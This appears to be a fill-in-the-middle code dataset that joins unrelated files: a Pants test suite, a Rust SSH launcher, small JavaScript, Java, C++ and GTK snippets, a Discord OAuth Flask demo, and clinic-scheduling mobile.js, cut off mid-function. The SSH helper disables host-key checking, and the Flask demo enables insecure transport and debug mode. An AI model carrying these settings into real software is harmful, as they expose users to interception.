<|file_name|>test_test.py<|end_file_name|><|fim▁begin|># Copyright 2018 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from abc import ABCMeta, abstractmethod from pathlib import PurePath from textwrap import dedent from typing import List, Tuple, Type from unittest.mock import Mock import pytest from pants.base.exceptions import ResolveError from pants.build_graph.address import Address from pants.engine.fs import ( EMPTY_DIRECTORY_DIGEST, Digest, FileContent, InputFilesContent, Workspace, ) from pants.engine.interactive_runner import InteractiveProcessRequest, InteractiveRunner from pants.engine.legacy.graph import HydratedTargetsWithOrigins, HydratedTargetWithOrigin from pants.engine.legacy.structs import TargetAdaptorWithOrigin from pants.engine.rules import UnionMembership from pants.rules.core.fmt_test import FmtTest from pants.rules.core.test import ( AddressAndTestResult, CoverageDataBatch, CoverageReport, FilesystemCoverageReport, Status, Test, TestDebugRequest, TestResult, TestRunner, WrappedTestRunner, run_tests, ) from pants.testutil.engine.util import MockConsole, MockGet, run_rule from pants.testutil.test_base import TestBase from pants.util.ordered_set import OrderedSet <|fim▁hole|> self.values = Mock(**values) class MockTestRunner(TestRunner, metaclass=ABCMeta): @staticmethod def is_valid_target(_: TargetAdaptorWithOrigin) -> bool: return True @staticmethod @abstractmethod def status(_: Address) -> Status: pass @staticmethod def stdout(_: Address) -> str: return "" @staticmethod def stderr(_: Address) -> str: return "" @property def test_result(self) -> TestResult: address = self.adaptor_with_origin.adaptor.address return TestResult(self.status(address), self.stdout(address), self.stderr(address)) class SuccessfulTestRunner(MockTestRunner): @staticmethod def status(_: Address) -> Status: return Status.SUCCESS @staticmethod def stdout(address: Address) -> str: return f"Successful test runner: Passed for {address}!" class ConditionallySucceedsTestRunner(MockTestRunner): @staticmethod def status(address: Address) -> Status: return Status.FAILURE if address.target_name == "bad" else Status.SUCCESS @staticmethod def stdout(address: Address) -> str: return ( f"Conditionally succeeds test runner: Passed for {address}!" if address.target_name != "bad" else "" ) @staticmethod def stderr(address: Address) -> str: return ( f"Conditionally succeeds test runner: Had an issue for {address}! Oh no!" if address.target_name == "bad" else "" ) class InvalidTargetTestRunner(MockTestRunner): @staticmethod def is_valid_target(_: TargetAdaptorWithOrigin) -> bool: return False @staticmethod def status(_: Address) -> Status: return Status.FAILURE class TestTest(TestBase): def make_ipr(self) -> InteractiveProcessRequest: input_files_content = InputFilesContent( (FileContent(path="program.py", content=b"def test(): pass"),) ) digest = self.request_single_product(Digest, input_files_content) return InteractiveProcessRequest( argv=("/usr/bin/python", "program.py",), run_in_workspace=False, input_files=digest, ) def run_test_rule( self, *, test_runner: Type[TestRunner], targets: List[HydratedTargetWithOrigin], debug: bool = False, ) -> Tuple[int, str]: console = MockConsole(use_colors=False) options = MockOptions(debug=debug, run_coverage=False) interactive_runner = InteractiveRunner(self.scheduler) workspace = Workspace(self.scheduler) union_membership = UnionMembership({TestRunner: OrderedSet([test_runner])}) def mock_coordinator_of_tests( wrapped_test_runner: WrappedTestRunner, ) -> AddressAndTestResult: runner = wrapped_test_runner.runner return AddressAndTestResult( address=runner.adaptor_with_origin.adaptor.address, test_result=runner.test_result, # type: ignore[attr-defined] ) result: Test = run_rule( run_tests, rule_args=[ console, options, interactive_runner, HydratedTargetsWithOrigins(targets), workspace, union_membership, ], mock_gets=[ MockGet( product_type=AddressAndTestResult, subject_type=WrappedTestRunner, mock=lambda wrapped_test_runner: mock_coordinator_of_tests(wrapped_test_runner), ), MockGet( product_type=TestDebugRequest, subject_type=TestRunner, mock=lambda _: TestDebugRequest(self.make_ipr()), ), MockGet( product_type=CoverageReport, subject_type=CoverageDataBatch, mock=lambda _: FilesystemCoverageReport( result_digest=EMPTY_DIRECTORY_DIGEST, directory_to_materialize_to=PurePath("mockety/mock"), ), ), ], union_membership=union_membership, ) return result.exit_code, console.stdout.getvalue() def test_empty_target_noops(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[FmtTest.make_hydrated_target_with_origin(include_sources=False)], ) assert exit_code == 0 assert stdout.strip() == "" def test_invalid_target_noops(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=InvalidTargetTestRunner, targets=[FmtTest.make_hydrated_target_with_origin()], ) assert exit_code == 0 assert stdout.strip() == "" def test_single_target(self) -> None: target_with_origin = FmtTest.make_hydrated_target_with_origin() address = target_with_origin.target.adaptor.address exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[target_with_origin], ) assert exit_code == 0 assert stdout == dedent( f"""\ {address} stdout: {SuccessfulTestRunner.stdout(address)} {address} ..... SUCCESS """ ) def test_multiple_targets(self) -> None: good_target = FmtTest.make_hydrated_target_with_origin(name="good") good_address = good_target.target.adaptor.address bad_target = FmtTest.make_hydrated_target_with_origin(name="bad") bad_address = bad_target.target.adaptor.address exit_code, stdout = self.run_test_rule( test_runner=ConditionallySucceedsTestRunner, targets=[good_target, bad_target], ) assert exit_code == 1 assert stdout == dedent( f"""\ {good_address} stdout: {ConditionallySucceedsTestRunner.stdout(good_address)} {bad_address} stderr: {ConditionallySucceedsTestRunner.stderr(bad_address)} {good_address} ..... SUCCESS {bad_address} ..... FAILURE """ ) def test_single_debug_target(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[FmtTest.make_hydrated_target_with_origin()], debug=True, ) assert exit_code == 0 def test_multiple_debug_targets_fail(self) -> None: with pytest.raises(ResolveError): self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[ FmtTest.make_hydrated_target_with_origin(name="t1"), FmtTest.make_hydrated_target_with_origin(name="t2"), ], debug=True, )<|fim▁end|>
# TODO(#9141): replace this with a proper util to create `GoalSubsystem`s class MockOptions: def __init__(self, **values):
<|file_name|>ssh.rs<|end_file_name|><|fim▁begin|>use libc::{c_char, execvp}; use std::io::prelude::*; use std::ffi::CString; use std::ptr; macro_rules! c_ptr { ($x:expr) => {{ CString::new($x).unwrap().as_ptr() }}; } fn exec_ssh(ip: &str, command: &str, verbose: bool) { let user_host: &str = &format!("rightscale@{}", ip); let ssh_command = format!("ssh -t -o StrictHostKeychecking=no -o UserKnownHostsFile=/dev/null {} \"{}\"", user_host, command); if verbose { println!("Running {}", ssh_command) } let argv: &[*const c_char] = &[c_ptr!("ssh"), c_ptr!("-t"), c_ptr!("-o"), c_ptr!("StrictHostKeyChecking=no"), c_ptr!("-o"), c_ptr!("UserKnownHostsFile=/dev/null"), c_ptr!(user_host), c_ptr!(command), ptr::null()]; unsafe { execvp(argv[0], &argv[0]); } die!("ssh command failed: {}", ssh_command); } fn ssh_command_arg(user: Option<String>, command: Option<String>) -> String { let user_prefix = user.and_then(|u| Some(format!("sudo -u \"{}\"", u))); let escaped_command = command.and_then(|c| Some(c.replace("\"", "\\\""))); match user_prefix { Some(u) => match escaped_command { Some(c) => format!("{} -- sh -cl \"{}\"", u, c), None => format!("{} -s", u) }, None => escaped_command.unwrap_or("".to_string()) } } pub fn ssh_connect(ip: String, user: Option<String>, command: Option<String>, verbose: bool) { exec_ssh(&ip, &ssh_command_arg(user, command), verbose); } #[cfg(test)] mod tests { mod ssh_command_arg { use super::super::ssh_command_arg; #[test] fn no_user() { assert_eq!("pwd".to_string(), ssh_command_arg(None, Some("pwd".to_string()))); } #[test] fn no_command() { assert_eq!("sudo -u \"sean\" -s".to_string(), ssh_command_arg(Some("sean".to_string()), None)); } #[test]<|fim▁hole|> } }<|fim▁end|>
fn user_and_command() { assert_eq!("sudo -u \"sean\" -- sh -cl \"cd / && /bin/bash\"".to_string(), ssh_command_arg(Some("sean".to_string()), Some("cd / && /bin/bash".to_string()))); }
<|file_name|>scholarship.js<|end_file_name|><|fim▁begin|>var View = require('ampersand-view'); var templates = require('../templates'); module.exports = View.extend({ template: templates.includes.scholarship, bindings: { 'model.field': '[role=field]', 'model.slots': '[role=slots]', 'model.holder': '[role=holder]', 'model.type': '[role=type]', 'model.link': { type: 'attribute', role: 'link', name: 'href' },<|fim▁hole|> } });<|fim▁end|>
'model.scholarshipIdUpperCase': '[role=link]', 'model.releaseDateFormated': '[role=release-date]', 'model.closeDateFormated': '[role=close-date]'
<|file_name|>radio-button.js<|end_file_name|><|fim▁begin|>HB.RadioButtonComponent = Ember.Component.extend({ tagName: 'input', type: 'radio', attributeBindings: ['type', 'htmlChecked:checked', 'value', 'name'], htmlChecked: function(){ return this.get('value') === this.get('checked'); }.property('value', 'checked'),<|fim▁hole|>});<|fim▁end|>
change: function(){ this.set('checked', this.get('value')); }
<|file_name|>wsgi.py<|end_file_name|><|fim▁begin|>""" WSGI config for goska project.<|fim▁hole|>https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/ """ import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "goska.settings") from django.core.wsgi import get_wsgi_application application = get_wsgi_application()<|fim▁end|>
It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see
<|file_name|>LoginPresenter.java<|end_file_name|><|fim▁begin|>package com.riteshakya.subs.views.screens.login; <|fim▁hole|>import com.google.android.gms.common.api.GoogleApiClient; import com.riteshakya.subs.mvp.FlowListener; import com.riteshakya.subs.mvp.IPresenter; import com.riteshakya.subs.mvp.IView; import com.riteshakya.subs.mvp.FlowListener; import com.riteshakya.subs.mvp.IPresenter; import com.riteshakya.subs.mvp.IView; /** * @author Ritesh Shakya */ public interface LoginPresenter extends IPresenter { void setView(LoginView loginView); void initialize(); void validateResult(Intent data); GoogleApiClient getGoogleApiClient(); interface LoginFlowListener extends FlowListener { void openMainActivity(); } interface LoginView extends IView { FragmentActivity getActivity(); } }<|fim▁end|>
import android.content.Intent; import android.support.v4.app.FragmentActivity;
<|file_name|>app.py<|end_file_name|><|fim▁begin|>import os from flask import Flask, g, session, redirect, request, url_for, jsonify from requests_oauthlib import OAuth2Session OAUTH2_CLIENT_ID = os.environ['OAUTH2_CLIENT_ID'] OAUTH2_CLIENT_SECRET = os.environ['OAUTH2_CLIENT_SECRET']<|fim▁hole|> API_BASE_URL = os.environ.get('API_BASE_URL', 'https://discordapp.com/api') AUTHORIZATION_BASE_URL = API_BASE_URL + '/oauth2/authorize' TOKEN_URL = API_BASE_URL + '/oauth2/token' app = Flask(__name__) app.debug = True app.config['SECRET_KEY'] = OAUTH2_CLIENT_SECRET if 'http://' in OAUTH2_REDIRECT_URI: os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = 'true' def token_updater(token): session['oauth2_token'] = token def make_session(token=None, state=None, scope=None): return OAuth2Session( client_id=OAUTH2_CLIENT_ID, token=token, state=state, scope=scope, redirect_uri=OAUTH2_REDIRECT_URI, auto_refresh_kwargs={ 'client_id': OAUTH2_CLIENT_ID, 'client_secret': OAUTH2_CLIENT_SECRET, }, auto_refresh_url=TOKEN_URL, token_updater=token_updater) @app.route('/') def index(): scope = request.args.get( 'scope', 'identify email connections guilds guilds.join') discord = make_session(scope=scope.split(' ')) authorization_url, state = discord.authorization_url(AUTHORIZATION_BASE_URL) session['oauth2_state'] = state return redirect(authorization_url) @app.route('/callback') def callback(): if request.values.get('error'): return request.values['error'] discord = make_session(state=session.get('oauth2_state')) token = discord.fetch_token( TOKEN_URL, client_secret=OAUTH2_CLIENT_SECRET, authorization_response=request.url) session['oauth2_token'] = token return redirect(url_for('.me')) @app.route('/me') def me(): discord = make_session(token=session.get('oauth2_token')) user = discord.get(API_BASE_URL + '/users/@me').json() guilds = discord.get(API_BASE_URL + '/users/@me/guilds').json() connections = discord.get(API_BASE_URL + '/users/@me/connections').json() return jsonify(user=user, guilds=guilds, connections=connections) if __name__ == '__main__': app.run()<|fim▁end|>
OAUTH2_REDIRECT_URI = 'http://localhost:5000/callback'
<|file_name|>main.cpp<|end_file_name|><|fim▁begin|>#include "Card.h" #include "Game.h" #include <iostream> #include <array> #include <string> #include <vector> #include <algorithm> #include <random> #include <cstdlib> #include <ctime> using namespace std; using namespace zks::game::card; int test_deck() { CardDeck deck(1); CardDeck d1, d2; deck.shuffle(); cout << "deck: " << deck.str() << endl; cout << "d1: " << d1.str() << endl; cout << "d2: " << d2.str() << endl; cout << "\nget from back:\n"; for (auto i = 0; i<10; ++i) { d1.put_card(deck.get_card()); cout << d1.str() << endl; } cout << "\nget from front:\n"; for (auto i = 0; i<10; ++i) { d2.put_card(deck.get_card(false)); cout << d2.str() << endl; } cout << "\n"; cout << "deck: " << deck.str() << endl; return 0; } int main() { Game g; cout << "game: \n" << g.str() << endl; <|fim▁hole|> g.prepare(); cout << "game: \n" << g.str() << endl; g.play(); cout << "game: \n" << g.str() << endl; g.post(); cout << "game: \n" << g.str() << endl; return 0; } int test_suite() { for (const auto& s : Suite()) { cout << to_string(s) << ", "; } cout << endl; return 0; } int test_number() { for (const auto& n : Number()) { cout << to_string(n) << ", "; } cout << endl; return 0; } int test_card() { vector<Card> deck; for (auto s = begin(Suite()); s<Suite::JOKER; ++s) { for (const auto& n : Number()) { deck.emplace_back(s, n); } } cout << "\n"; for (auto const& c : deck) { cout << to_string(c) << ", "; } cout << "\n"; std::srand(std::time(0)); std::array<int, std::mt19937::state_size> seed_data; std::generate(seed_data.begin(), seed_data.end(), std::rand); std::seed_seq seq(seed_data.begin(), seed_data.end()); std::mt19937 g(seq); std::shuffle(deck.begin(), deck.end(), g); cout << "\n"; for (auto const& c : deck) { cout << to_string(c) << ", "; } cout << "\n"; return 0; }<|fim▁end|>
<|file_name|>buttons-input.rs<|end_file_name|><|fim▁begin|>/* * Copyright (c) 2018 Boucher, Antoni <[email protected]> * * Permission is hereby granted, free of charge, to any person obtaining a copy of * this software and associated documentation files (the "Software"), to deal in * the Software without restriction, including without limitation the rights to * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of * the Software, and to permit persons to whom the Software is furnished to do so, * subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR<|fim▁hole|> * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ use gtk::{ EditableSignals, Inhibit, prelude::ButtonExt, prelude::EntryExt, prelude::LabelExt, prelude::OrientableExt, prelude::WidgetExt, }; use gtk::Orientation::{Horizontal, Vertical}; use relm::{Relm, Widget}; use relm_derive::{Msg, widget}; use self::Msg::*; pub struct Model { left_text: String, relm: Relm<Win>, right_text: String, text: String, } #[derive(Clone, Msg)] pub enum Msg { Cancel, Concat, DataAvailable(String), DataCleared, LeftChanged(String), RightChanged(String), Quit, } #[widget] impl Widget for Win { fn model(relm: &Relm<Self>, (): ()) -> Model { Model { left_text: String::new(), right_text: String::new(), relm: relm.clone(), text: String::new(), } } fn update(&mut self, event: Msg) { match event { Cancel => { self.model.left_text = String::new(); self.model.right_text = String::new(); self.model.text = String::new(); self.model.relm.stream().emit(DataCleared); }, Concat => { self.model.text = format!("{}{}", self.model.left_text, self.model.right_text); self.model.relm.stream().emit(DataAvailable(self.model.text.clone())); }, // To be listened to by the user. DataAvailable(_) | DataCleared => (), LeftChanged(text) => self.model.left_text = text, RightChanged(text) => self.model.right_text = text, Quit => gtk::main_quit(), } } view! { #[name="window"] gtk::Window { gtk::Box { gtk::Box { #[name="left_entry"] gtk::Entry { text: &self.model.left_text, changed(entry) => LeftChanged(entry.text().to_string()), }, #[name="right_entry"] gtk::Entry { text: &self.model.right_text, changed(entry) => RightChanged(entry.text().to_string()), }, orientation: Horizontal, }, gtk::ButtonBox { #[name="concat_button"] gtk::Button { clicked => Concat, label: "Concat", }, #[name="cancel_button"] gtk::Button { clicked => Cancel, label: "Cancel", }, orientation: Horizontal, }, orientation: Vertical, #[name="label"] gtk::Label { label: &self.model.text, }, }, delete_event(_, _) => (Quit, Inhibit(false)), } } } #[cfg(test)] mod tests { use gdk::keys::constants as key; use gtk::prelude::{ EntryExt, GtkWindowExt, LabelExt, WidgetExt, }; use gtk_test::{ assert_text, focus, }; use relm_test::{ enter_key, enter_keys, relm_observer_new, relm_observer_wait, }; use crate::Msg::{DataAvailable, DataCleared}; use crate::Win; #[test] fn label_change() { let (component, _, widgets) = relm::init_test::<Win>(()).expect("init_test failed"); let cancel_button = &widgets.cancel_button; let concat_button = &widgets.concat_button; let label = &widgets.label; let left_entry = &widgets.left_entry; let right_entry = &widgets.right_entry; let window = &widgets.window; let available_observer = relm_observer_new!(component, DataAvailable(_)); let cleared_observer = relm_observer_new!(component, DataCleared); assert_text!(label, ""); enter_keys(&window.focused_widget().expect("focused widget"), "left"); enter_key(window, key::Tab); assert!(right_entry.has_focus()); enter_keys(&window.focused_widget().expect("focused widget"), "right"); enter_key(window, key::Tab); assert!(concat_button.has_focus()); enter_key( &window.focused_widget().expect("focused widget"), key::space, ); assert_text!(label, "leftright"); enter_key(window, key::Tab); assert!(cancel_button.has_focus()); enter_key( &window.focused_widget().expect("focused widget"), key::space, ); assert_text!(label, ""); assert_text!(left_entry, ""); assert_text!(right_entry, ""); focus(left_entry); assert!(left_entry.has_focus()); focus(right_entry); assert!(right_entry.has_focus()); relm_observer_wait!(let DataAvailable(text) = available_observer); assert_eq!(text, "leftright"); relm_observer_wait!(let DataCleared = cleared_observer); } }<|fim▁end|>
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
<|file_name|>ControllerType.java<|end_file_name|><|fim▁begin|>package com.raoulvdberge.refinedstorage.block.enums; import net.minecraft.util.IStringSerializable; public enum ControllerType implements IStringSerializable { NORMAL(0, "normal"), CREATIVE(1, "creative"); private int id; private String name; ControllerType(int id, String name) { this.id = id; this.name = name; }<|fim▁hole|> } public int getId() { return id; } @Override public String toString() { return name; } }<|fim▁end|>
@Override public String getName() { return name;
<|file_name|>mobile.js<|end_file_name|><|fim▁begin|>toastr.options = { "closeButton": true, "debug": false, "newestOnTop": true, "progressBar": true, "positionClass": "toast-bottom-full-width", "preventDuplicates": false, "showDuration": "300", "hideDuration": "1000", "timeOut": "5000", "extendedTimeOut": "1000", "showEasing": "swing", "hideEasing": "linear", "showMethod": "fadeIn", "hideMethod": "fadeOut" }; function checkEmpty(o,n) { if (o.val() === '' || o.val() === null) { var text = n.replace(":",""); toastr.error(text + " Required"); o.addClass("ui-state-error"); return false; } else { o.removeClass("ui-state-error"); return true; } } function checkNumeric(o,n) { if (! $.isNumeric(o.val())) { var text = n.replace(":",""); toastr.error(text + " is not a number!"); o.addClass("ui-state-error"); return false; } else { o.removeClass("ui-state-error"); return true; } } function checkRegexp( o, regexp, n ) { if ( !( regexp.test( o.val() ) ) ) { var text = n.replace(":",""); toastr.error("Incorrect format: " + text); o.addClass("ui-state-error"); return false; } else { o.removeClass("ui-state-error"); return true; } } function split( val ) { return val.split( /\n\s*/ ); } function extractLast( term ) { return split( term ).pop(); } function search_array(a, query_value){ var query_value1 = query_value.replace('?','\\?'); var query_value2 = query_value1.replace('(','\\('); var query_value3 = query_value2.replace(')','\\)'); var query_value4 = query_value3.replace('+','\\+'); var query_value5 = query_value4.replace('/','\\/'); var found = $.map(a, function (value) { var re = RegExp(query_value5, "g"); if(value.match(re)) { return value; } else { return null; } }); return found; } function progressbartrack() { if (parseInt(noshdata.progress) < 100) { if (noshdata.progress === 0) { $("#dialog_progressbar").progressbar({value:0}); } $.ajax({ type: "POST", url: "ajaxdashboard/progressbar-track", success: function(data){ $("#dialog_progressbar").progressbar("value", parseInt(data)); if (parseInt(data) < 100) { setTimeout(progressbartrack(),1000); noshdata.progress = data; } else { $.ajax({ type: "POST", url: "ajaxdashboard/delete-progress", success: function(data){ $("#dialog_progressbar").progressbar('destroy'); $("#dialog_load").dialog('close'); noshdata.progress = 0; } }); } } }); } } function reload_grid(id) { if ($("#"+id)[0].grid) { jQuery("#"+id).trigger("reloadGrid"); } } function open_demographics() { $.ajax({ type: "POST", url: "ajaxdashboard/demographics", dataType: "json", success: function(data){ $.each(data, function(key, value){ if (key == 'DOB') { value = editDate1(data.DOB); } $("#edit_demographics_form :input[name='" + key + "']").val(value); }); if (noshdata.group_id != '100') { $.ajax({ type: "POST", url: "ajaxdashboard/check-registration-code", success: function(data){ if (data == 'n') { $("#register_menu_demographics").show(); } else { $("#register_menu_demographics").hide(); $("#menu_registration_code").html(data); } } }); } $("#menu_lastname").focus(); $("#demographics_list_dialog").dialog('open'); } }); } function schedule_autosave() { var d = $('#providers_calendar').fullCalendar('getDate'); var n = d.getFullYear(); n = n + "," + d.getMonth(); n = n + "," + d.getDate(); var view = $('#providers_calendar').fullCalendar('getView'); n = n + "," + view.name; $.cookie('nosh-schedule', n, { path: '/' }); } function addMinutes(date, minutes) { return new Date(date.getTime() + minutes*60000); } function isOverlapping(start){ var array = $('#providers_calendar').fullCalendar('clientEvents'); var end = addMinutes(start, 15); for(var i in array){ if(!(array[i].start >= end || array[i].end <= start)){ return true; } } return false; } function loadappt() { $("#patient_appt").show(); $("#start_form").show(); $("#reason_form").show(); $("#other_event").hide(); $("#event_choose").hide(); $("#patient_search").focus(); } function loadevent() { $("#patient_appt").hide(); $("#other_event").show(); $("#start_form").show(); $("#reason_form").show(); $("#event_choose").hide(); $("#reason").focus(); } function loadcalendar (y,m,d,view) { $('#providers_calendar').fullCalendar('destroy'); $('#providers_calendar').fullCalendar({ year: y, month: m, date: d, weekends: noshdata.weekends, minTime: noshdata.minTime, maxTime: noshdata.maxTime, theme: true, allDayDefault: false, slotMinutes: 15, defaultView: view, aspectRatio: 0.8, header: { left: 'prev,next today', center: 'title', right: 'agendaWeek,agendaDay' }, editable: true, events: function(start, end, callback) { var starttime = Math.round(start.getTime() / 1000); var endtime = Math.round(end.getTime() / 1000); $.ajax({ type: "POST", url: "ajaxschedule/provider-schedule", dataType: 'json', data: "start=" + starttime + "&end=" + endtime, success: function(events) { callback(events); } }); }, dayClick: function(date, allDay, jsEvent, view) { if (allDay) { $.jGrowl('Clicked on the entire day: ' + date); } else { if (noshdata.group_id == 'schedule') { if(confirm('You will need to login to schedule an appointment. Proceed?')){ window.location = noshdata.login_url; } } else { if (noshdata.group_id != '1') { if (noshdata.group_id != '100') { $("#event_dialog").dialog("option", "title", "Schedule an Appointment"); $("#event_dialog").dialog('open'); $("#title").focus(); $("#start_date").val($.fullCalendar.formatDate(date, 'MM/dd/yyyy')); $("#start_time").val($.fullCalendar.formatDate(date, 'hh:mmTT')); $("#end").val(''); $("#schedule_visit_type").val(''); $("#end_row").show(); $("#title").val(''); $("#reason").val(''); $("#until").val(''); $("#until_row").hide(); $('#repeat').val(''); $('#status').val(''); $("#delete_form").hide(); $(".nosh_schedule_exist_event").hide(); $("#patient_appt").hide(); $("#other_event").hide(); $("#until_row").hide(); $("#start_form").hide(); $("#reason_form").hide(); $("#event_choose").show(); } else { if (isOverlapping(date)) { $.jGrowl('You cannot schedule an appointment in this time slot!'); } else { $("#schedule_visit_type").focus(); $("#start").text($.fullCalendar.formatDate(date, 'dddd, MM/dd/yyyy, hh:mmTT')); $("#start_date").val($.fullCalendar.formatDate(date, 'MM/dd/yyyy')); $("#start_time").val($.fullCalendar.formatDate(date, 'hh:mmTT')); $("#end").val(''); $("#schedule_visit_type").val(''); $("#reason").val(''); $("#until").val(''); $("#until_row").hide(); $('#repeat').val(''); $("#delete_form").hide("fast"); $("#patient_appt").show(); $("#start_form").show(); $("#reason_form").show(); $("#other_event").hide(); $("#event_choose").hide(); $("#event_dialog").dialog("option", "title", "Schedule an Appointment"); $("#event_dialog").dialog('open'); } } } } } }, eventClick: function(calEvent, jsEvent, view) { if (noshdata.group_id != '1') { $("#event_id").val(calEvent.id); $("#event_id_span").text(calEvent.id); $("#schedule_pid").val(calEvent.pid); $("#pid_span").text(calEvent.pid); $("#timestamp_span").text(calEvent.timestamp); $("#start_date").val($.fullCalendar.formatDate(calEvent.start, 'MM/dd/yyyy')); $("#start_time").val($.fullCalendar.formatDate(calEvent.start, 'hh:mmTT')); $("#end").val($.fullCalendar.formatDate(calEvent.end, 'hh:mmTT')); $("#schedule_title").val(calEvent.title); $("#schedule_visit_type").val(calEvent.visit_type); if (calEvent.visit_type){ loadappt(); $("#patient_search").val(calEvent.title); $("#end").val(''); } else { loadevent(); } $("#reason").val(calEvent.reason); $("#repeat").val(calEvent.repeat); $("#until").val(calEvent.until); var repeat_select = $("#repeat").val(); if (repeat_select != ''){ $("#until_row").show(); } else { $("#until_row").hide(); $("#until").val(''); } $("#status").val(calEvent.status); $("#notes").val(calEvent.notes); $("#delete_form").show(); $(".nosh_schedule_exist_event").show(); $("#event_choose").hide(); if (calEvent.editable != false) { $("#event_dialog").dialog("option", "title", "Edit an Appointment"); $("#event_dialog").dialog('open'); $("#title").focus(); } } }, eventDrop: function(event,dayDelta,minuteDelta,allDay,revertFunc) { if (noshdata.group_id != '1') { var start = Math.round(event.start.getTime() / 1000); var end = Math.round(event.end.getTime() / 1000); if(start){ $.ajax({ type: "POST", url: "ajaxschedule/drag-event", data: "start=" + start + "&end=" + end + "&id=" + event.id, success: function(data){ $.jGrowl("Event updated!"); } }); } else { revertFunc(); } $('.fc-event').each(function(){ $(this).tooltip('disable'); }); } else { revertFunc(); $.jGrowl("You don't have permission to do this!"); } }, eventResize: function(event,dayDelta,minuteDelta,allDay,revertFunc) { if (noshdata.group_id != '1') { var start = Math.round(event.start.getTime() / 1000); var end = Math.round(event.end.getTime() / 1000); if(start){ $.ajax({ type: "POST", url: "ajaxschedule/drag-event", data: "start=" + start + "&end=" + end + "&id=" + event.id, success: function(data){ $.jGrowl("Event updated!"); } }); } else { revertFunc(); } $('.fc-event').each(function(){ $(this).tooltip('disable'); }); } else { revertFunc(); $.jGrowl("You don't have permission to do this!"); } }, eventRender: function(event, element) { var display = 'Reason: ' + event.reason + '<br>Status: ' + event.status + '<br>' + event.notes; element.tooltip({ items: element, hide: false, show: false, content: display }); element.tooltip('enable'); } }); $('#providers_datepicker').datepicker('destroy'); $('#providers_datepicker').datepicker({ inline: true, onSelect: function(dateText, inst) { var d = new Date(dateText); $('#providers_calendar').fullCalendar('gotoDate', d); var n = d.getFullYear(); n = n + "," + d.getMonth(); n = n + "," + d.getDate(); var view = $('#providers_calendar').fullCalendar('getView'); n = n + "," + view.name; $.cookie('nosh-schedule', n, { path: '/' }); } }); } function open_schedule_list(dateText, inst, load) { var starttime = Math.round(+new Date(dateText)/1000); var endtime = starttime+86400; var startday = moment(starttime*1000).format('YYYY-MM-DD'); var startday1 = 'Appointments for ' + moment(starttime*1000).format('MMMM Do YYYY') + ":"; $ul = $("#events"); $.mobile.loading("show"); $("#providers_date").html(startday1); var html = '<li><a href="#" id="patient_appt_button" class="nosh_schedule_event" data-nosh-start="' + startday + '">Add Appointment</a></li>'; html += '<li><a href="#" id="event_appt_button" class="nosh_schedule_event" data-nosh-start="' + startday + '">Add Event</a></li>'; $.ajax({ type: "POST", url: "ajaxschedule/provider-schedule", dataType: 'json', data: "start=" + starttime + "&end=" + endtime }) .then(function(response) { $.each(response, function ( i, val ) { var label = '<h3>' + val.title + '</h3>'; if (val.reason != val.title) { label += '<p>Reason: ' + val.reason + '</p>'; } if (val.visit_type != undefined) { label += '<p>Visit Type: ' + val.visit_type + '</p>'; } var date = $.datepicker.formatDate('M dd, yy, ', new Date(val.start)); var start_time = moment(new Date(val.start)).format('HH:mmA'); var end_time = moment(new Date(val.end)).format('HH:mmA'); var start_date = moment(new Date(val.start)).format('MM/DD/YYYY'); var color1 = 'clr-black'; if(val.className==" colorred"){ color1 = 'clr-red'; } if(val.className==" colororange"){ color1 = "clr-orange"; } if(val.className==" coloryellow"){ color1 = "clr-yellow"; } if(val.className==" colorgreen"){ color1 = "clr-green"; } if(val.className==" colorblue"){ color1 = "clr-blue"; } if(val.className==" colorpurple"){ color1 = "clr-purple"; } if(val.className==" colorbrown"){ color1 = "clr-brown" } label += '<span class="'+ color1 + '">' + date + start_time + '-' + end_time + '</span>'; html += '<li><a href="#" class="nosh_schedule_event" data-nosh-event-id="' + val.id + '" data-nosh-pid="' + val.pid + '" data-nosh-title="' + val.title + '" data-nosh-start-date="' + start_date + '" data-nosh-start-time="' + start_time + '" data-nosh-end-time="' + end_time + '" data-nosh-visit-type="' + val.visit_type + '" data-nosh-timestamp="' + val.timestamp + '" data-nosh-repeat="' + val.repeat + '" data-nosh-reason="' + val.reason + '" data-nosh-until="' + val.until + '" data-nosh-notes="' + val.notes + '" data-nosh-status="' + val.status + '" data-nosh-editable="' + val.editable + '">' + label + '</a></li>'; }); $ul.html(html); $ul.listview("refresh"); $ul.trigger("updatelayout"); $.mobile.loading("hide"); if (load !== undefined) { $('html, body').animate({ scrollTop: $("#patient_appt_button").offset().top }); } }); } function open_schedule(startdate) { $('#providers_datepicker').datepicker({ inline: true, onSelect: function (dateText, inst) { open_schedule_list(dateText, inst, true); } }); if (startdate == null) { $("#providers_datepicker").datepicker("setDate", new Date()); var date = moment().valueOf(); } else { var date = moment(startdate).valueOf(); $("#providers_datepicker").datepicker("setDate", new Date(date)); } open_schedule_list(date); $("#provider_list2").focus(); } function open_messaging(type) { $.mobile.loading("show"); $ul = $("#"+type); var command = type.replace('_', '-'); $.ajax({ type: "POST", url: "ajaxmessaging/" + command, data: "sidx=date&sord=desc&rows=1000000&page=1", dataType: 'json' }).then(function(response) { if (type == 'internal_inbox') { var col = ['message-id','message-to','read','date','message-from','message-from-label','subject','body','cc','pid','patient_name','bodytext','t-messages-id','documents-id']; } if (type == 'internal_draft') { var col = 